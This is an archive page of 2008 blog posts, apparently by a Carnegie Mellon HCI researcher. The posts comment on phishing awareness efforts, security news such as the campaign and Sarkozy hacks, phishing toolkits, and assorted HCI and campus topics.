Showing posts from 2008

Dressing up as a Phish

Sasha Romanosky points me to a story about a security analyst dressing up as a phish to educate students. This reminds me of that time Randy Pausch dressed up as some character from Alice in Wonderland and gave away Alice CDs. I have to admit, this is definitely going to be memorable for the students.

Tech-Security Official at U. of Virginia Wears Fish Costume to Raise Awareness of 'Phishing'

When Karen McDowell dressed up in a purple fish costume and walked around the University of Virginia’s campus last month, she got plenty of attention for her cause, even though she had to explain the meaning of her outfit. Ms. McDowell is a security analyst for the university, and her goal was to raise awareness about e-mail phishing schemes, in which con artists send e-mail messages hoping to lure people into giving out their passwords or other personal information.

When Phishing Education Goes Bad

A sad, funny, and frustrating story about phishing education. Don't know if this is true or not, but I can see it happening.

Auburn University's CIO sends out a warning to students, faculty, and staff about phishing, and includes an example of phishing in his email. A few days later, he sends out another email, excerpt below:

"In my previous alert, I included the text of a phishing email as an example. Some students misunderstood that I was asking for user name and password, and replied with that information. Please be aware that you shouldn’t provide this information to anyone."

Obama and McCain Computers Hacked

This Newsweek article talking about Obama and McCain computers being hacked is light on details (probably because of an ongoing investigation), but is disconcerting in terms of its implications.

At the Obama headquarters in midsummer, technology experts detected what they initially thought was a computer virus—a case of "phishing," a form of hacking often employed to steal passwords or credit-card numbers. But by the next day, both the FBI and the Secret Service came to the campaign with an ominous warning: "You have a problem way bigger than what you understand," an agent told Obama's team. "You have been compromised, and a serious amount of files have been loaded off your system."

Missed Connections

I've been a fan of Craigslist's Missed Connections for a while, as any of my friends will tell you. There's something wistful about them, as in a Krystof Kiewslowski film. It turns out that CNN has an article about these kinds of sites, and that there were a lot more than I realized. CNN lists not only Craigslist, but also,, and

CNN: Sarkozy's bank account hacked

Not a lot of details, but it's likely a phishing attack, malware, or an inside job.

The French Cabinet's spokesman says "swindlers" have broken into the personal bank account of President Nicolas Sarkozy. French President Nicolas Sarkozy reported the theft from his account last month, say media. Spokesman Luc Chatel told France's Radio-J an investigation is under way and insists the incident "proves that this system of checking (bank accounts) via the Internet isn't infallible." He did not elaborate.

Teaching Consumers On-Line Safety Easiest When They Take the Bait

The Anti-Phishing Working Group (APWG) and Carnegie Mellon University’s Supporting Trust Decisions Project have established a phishing page redirect initiative that protects global online consumers who have been tricked into clicking links in scam emails by delivering them to Web pages that instruct them on the dangers of phishing – and how to avoid them. The program was announced today at the APWG conference in Atlanta.


A New Baby Naming Service

Here's a new baby naming service that we could all use. Given your last name, what kinds of first names should you avoid so that your child won't be on the TSA no-fly list.

“The woman at the ticket counter demanded, ‘Who is John Anderson?’ ” Ms. Anderson recalled. She pointed at the baby stroller and said, “He’s right here.” The suspect, then 2 years old, blinked his big blue eyes and happily gummed his pacifier.“That baby’s on the no-fly watch list,” the agent said.

It Would Take a Week to Read All Your Privacy Policies

Washington Post on some work being done at CMU


Lost in the Fine Print: It Would Take a Week to Read All Your Privacy Policies

It would take the average American about 42 hours -- an entire work week -- to read the online privacy policies for the Web-sites they encounter each year, according to new research being presented this weekend.

Facebook Phishing

Some colleagues and I talked about this potential threat a few months ago, and it looks like it's finally starting to happen.

Some Facebook users checking their accounts Wednesday found odd postings of messages on their "wall" from one of their friends, saying: "lol i can't believe these pics got posted.... it's going to be BADDDD when her boyfriend sees these," followed by what looks like a genuine Facebook link.

But the link leads to a fake Facebook login page hosted on a Chinese .cn domain. The fake page actually logs the victims into Facebook, but also keeps a copy of their user names and passwords.

Soon after, the hackers post messages containing the same URL on the public "walls" of the users' friends. The technique is a powerful phishing scam, because the link seems to be coming from a trusted friend.


Hackers can use the compromised profiles to host Trojan horses such …

New IE8 Features for Anti-Phishing

The next version of Internet Explorer 8 will have new features to protect people from phishing attacks. Some of these features were developed by CMU's very own Serge Egelman. Nice work Serge!

Some highlights include:

Better warning messages (based on our past work on warnings in web browsers [PDF])
Better heuristics for detecting scams (I'd be interested in learning more about how these work)
Anti-malware support
Really interesting article in the NYTimes about the Eye-Fi card, which also geotags your photos for you using Skyhook.

Also, see below about interesting news about the location capabilities of the next iPhone.


[The Eye-Fi Share card] is a 2-gigabyte memory card ($100), compatible with most digital cameras, with a twist: it has Wi-Fi networking built in. Each time you bring your camera home to your wireless network, it transmits your photos back to the
computer, automatically and wirelessly. It can also upload them to Flickr, Picasa or another online photo-gallery site, automatically and wirelessly.

You know how your digital camera gives every photo an invisible time and date stamp? Well, the Eye-Fi Explore ($130) card invisibly stamps every photo with where you took it.


(Indeed, the new iPhone, coming July 11, incorporates both G.P.S. and Skyhook. It even has a third location system, developed by Google, that pinpoints your location by studying your proximity to cellphone towers.…

World of Warcraft introducing 2-Factor Authentication

I didn't expect to have two posts in a row about World of Warcraft, but I found this one too interesting to resist. It looks like Blizzard will be making physical tokens available for customers to purchase, to increase the security of their accounts. Apparently, there have been many hacked accounts, leading to the loss of (virtual) gold and items. This was a venue for phishing and malware that I didn't see coming, but it makes sense once you see how the value chain eventually ends up as cash.
A fun read about a scientific conference held in World of Warcraft about World of Warcraft.

Thus began the first scientific conference held in Azeroth, the online universe inhabited by millions of people playing World of Warcraft. Anyone who has been part of a conference's organizing committee knows that some glitches and mishaps are just unavoidable. And as usual, the problems that actually did occur were unforeseen. It was a success nonetheless. By the end of the third day, a real scientific exchange took place, I married one of the conference participants, and within an hour of the wedding, we were all dead.


With fireworks bursting and confetti still drifting all around the dancing mob of wedding guests, Catullus announced the final event: a massive attack on Sentinel Hill, an Alliance stronghold. As we surged over the hills around the unsuspecting fort, everyone yelled, "For Science!" Bainbridge had enlisted the help of Alea Iacta Est, the largest guild in Azeroth. …

Microsoft Hires CastleCops founder

Microsoft has hired Paul Laudanski, the man behind the anti-phishing website, to help with the software company's phishing and spam investigations.

Laudanski, a former volunteer firefighter, announced the move on last week, saying that he's looking to find someone else to run the site that he founded in 2002.

Walt Mossberg on Protecting Yourself from Identity Theft

You know phishing has become a mainstream problem when Walt Mossberg writes about it.

When most people think about Internet security problems, they focus on viruses and spyware -- technological attacks that can usually be mitigated by technological defenses. But the most insidious Internet security problems today rely on human gullibility, not tricky software...These types of attacks are called "social engineering," and they are used by criminals to steal your money and identity, and to plant on your computer malicious software that can be used to keep ripping you off.


John Seely Brown presents a nice framework for thinking about innovation:

Incremental innovation, that is "cheaper, thinner, faster and, of course, more features."
Architectural innovations, which involve "a restructuring of the very building blocks of a product family, industry, or infrastructure." Think Skype or Cloud Computing, which offers a new way of doing something we're already doing.
Disruptive innovations, which are innovations that "cause us to see and interact with the world differently." Examples include Memex, automobiles, and Sketchpad.

Attorney General Mukasey Outlines Criminal Threats to Infrastructure

Article in CNN describes Mukasey's description of the problems. Most relevant for our work in computer science:

The use of cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures and the security and solvency of financial investment markets.

Business Week on E-Spionage

Business Week has a really interesting article on the growing threat of e-spionage.

The U.S. government, and its sprawl of defense contractors, have been the victims of an unprecedented rash of similar cyber attacks over the last two years, say current and former U.S. government officials. "It's espionage on a massive scale," says Paul B. Kurtz, a former high-ranking national security official. Government agencies reported 12,986 cyber security incidents to the U.S. Homeland Security Dept. last fiscal year, triple the number from two years earlier. Incursions on the military's networks were up 55% last year, says Lieutenant General Charles E. Croom, head of the Pentagon's Joint Task Force for Global Network Operations. Private targets like Booz Allen are just as vulnerable and pose just as much potential security risk.


On Apr. 8, Homeland Security Dept. Secretary Michael Chertoff called the President's order a cyber security "Manhattan Project."


Utility of Multicore Chips?

I have to admit that I'm a skeptic of multicore chips. Even though they're part of many CPUs shipping today, it's just not clear to me what problem they solve. We've already had marginal returns on CPU performance, in terms of human productivity. The bottleneck just isn't the microprocessor anymore.

Don Knuth also sees some challenges for multicore:

Let me put it this way: During the past 50 years, I’ve written well over a thousand programs, many of which have substantial size. I can’t think of even five of those programs that would have been enhanced noticeably by parallelism or multithreading. Surely, for example, multiple processors are no help to TeX.

On the other hand, multicore might represent an opportunity. One of the trends in research this past decade has been novel ways of "wasting" CPU to enable other desirable properties, such as security and usability. All we need now is a clearer path for making this happen.

Google Lookup Feature

This is a really neat feature in Google Spreadsheets:

To insert the number of Internet users in Paraguay:
=GoogleLookup("Paraguay"; "internet users")
To insert the Earned Run Average of Roger Clemens:
=GoogleLookup("Roger Clemens"; "earned run average")

NYTimes: It Takes a Cyber Village to Catch an Auto Thief

I like this idea of "open-source crime solving", as it reminds me a lot of PhishTank and CastleCops. It is, however, an idea that is fraught with issues of trust, reliability, and vigilantism.

Online auto forums have helped unravel crimes before. Two years ago, a detective in Los Angeles used the forum on, a Nissan enthusiast site, to track down victims of an elaborate fraud scheme. (That case, too, involved Nissan Skylines.)

The site had also played a role in earlier cases of what might be called open-source crime solving. A year ago one of its members saw a hit-and-run accident a block in front of him, said Shelton Kwan, who co-founded the site with his cousin Ken Chan in 2002. “He took pictures. And the guy who got hit was another member of ours.”

NYTimes Link

Free Public Wifi!

Finally, an explanation for why I keep seeing "Free Public Wifi" in more and more places.

...Windows XP and friends are designed to pretend to be certain kinds of WiFi networks that you might have connected to in the past (a so-called AdHoc or peer-to-peer WiFi network). AdHoc networks aren't that common, but the point is that if you ever tried to connect to one with your WinXP laptop, later on it will broadcast to the world that it is that network.

Then other laptops will see that network, and some will try to connect, and they are then "infected" with this broadcasting "virus." It's not a traditional computer virus of course, just a set of behaviors that spread virally. The most widely spread early names will continue to spread even more because of the nature of this system. Ever see a network called "Free Public WiFi" but when you connect, it didn't work? Congratulations, you are now part of the problem....…

CMU HCII's Johnny Lee featured in Business Week Interview

Apparently, an interview with Business Week reveals that CMU's very own Johnny Lee is now the leader of a cult! :)

Congratulations Johnny!

Over the past 12 months, a series of quirky but compelling videos uploaded to Google's (GOOG) YouTube have been delighting hackers, designers, and tech tinkerers worldwide. The videos, which feature modifications of Nintendo's (NTDOY) popular Wii
console to create everything from mind-boggling 3D images to interactive whiteboards, have earned their creator a cultlike following and inspired countless other experiments.


Twenty Years of Four HCI Conferences

This is an interesting article showing various visualizations of four different HCI conferences: CHI, UIST, InfoViz, and AVI. There is certainly an element of belly gazing going on here, but I also think it's interesting what kinds of conclusions can be drawn from the different visualizations.

The authors also present some strategies for producing key publications:

Have the right idea at the right time
Collaborate with other senior researchers
Supervise a good number of (good) students
Publish in the right conferences

HCII candidates for YouTube Awards

"The Human-Computer Interaction Institute is well represented among the nominees for the second annual YouTube Awards. .

The video of Prof. Randy Pausch’s Sept. 18 lecture, “Really Achieving Your Childhood Dreams,” has been nominated for Most Inspirational. PhD student Johnny Chung Lee and his “Head Tracking for Desktop VR” video are nominated in the Instructional Video category.

Winners will be chosen based on popular voting. Individuals can vote once a day in each of the 12 YouTube categories through March 19. "

Phishing Attack against CMU

Well, this was bound to happen sooner or later, but there was a recent phishing attack targeting members of the CMU community. And, no, this wasn't an experiment from our research team.

SCS Computing Facilities has received the following announcement from campus
Computing Services.

*** To verify the authenticity of this message, see Security News &
Events at ***

WHO: Everyone
WHAT: Phishing Emails Sent to Carnegie Mellon Accounts
WHEN: Feb 21, 2008

HOW: Fraudulent emails have recently been sent to Carnegie Mellon
email accounts claiming to be from the "CMU SUPPORT TEAM
" asking people to reply with their "CMU Webmail
account" passwords.


Gorgeous Virtual Book

This is a digital online book that demonstrates a variety of user interactions. It's really beautiful and well done.

Why Programming Languages need More HCI

I just posted a comment to Lambda the Ultimate trying to clarify some misunderstandings about user testing and HCI. Here is the original comment, and my reply is below.

I just created an account to reply to the above post. Just for background purposes, I teach human-computer interaction at Carnegie Mellon University, and am part of the School for Computer Science.

I believe the above poster is making a similar argument that Doug Engelbart made a long time back about the difference between tricycles and bicycles. More specifically, if ease of use was all that mattered, then we would all be riding tricycles.

However, I believe that the above post shows a common misunderstanding of the nature of user tests, and human-computer interaction more broadly. Specifically, HCI is not just about ease of use for "walk up and use" interfaces. We advocate that designers should understand the context of use, set appropriate goals, and measure that we are achieving those goals. Like security or…

Resolved: Should Squirrels be Considered the Superior Species on Earth?

After watching this video of squirrels running thru obstacle courses, I'm not so sure we humans should be so proud of our achievemenets:

When Toolkits Go Bad

As someone who has been involved in the development of some user interface toolkits, I have to admit I'm simultaneously amused and really annoyed at this latest development, namely phishing toolkits that lower the barriers to entry for criminals.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

This one toolkit, however, is somewhat humorous in that it tries to scam the scammers.

Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by t…

San Juan Airport Wifi

While on a layover in the San Juan airport in Puerto Rico, I was checking if there were any WiFi access points around, and see this humorously named hotspot.

The Higest Rated Youtube Video of all time is...

by the HCII's very own Johnny Lee, on using Nintendo Wiimotes for head-mounted virtual reality. 1.7 million views since it was posted 2 weeks ago. Way to go Johnny!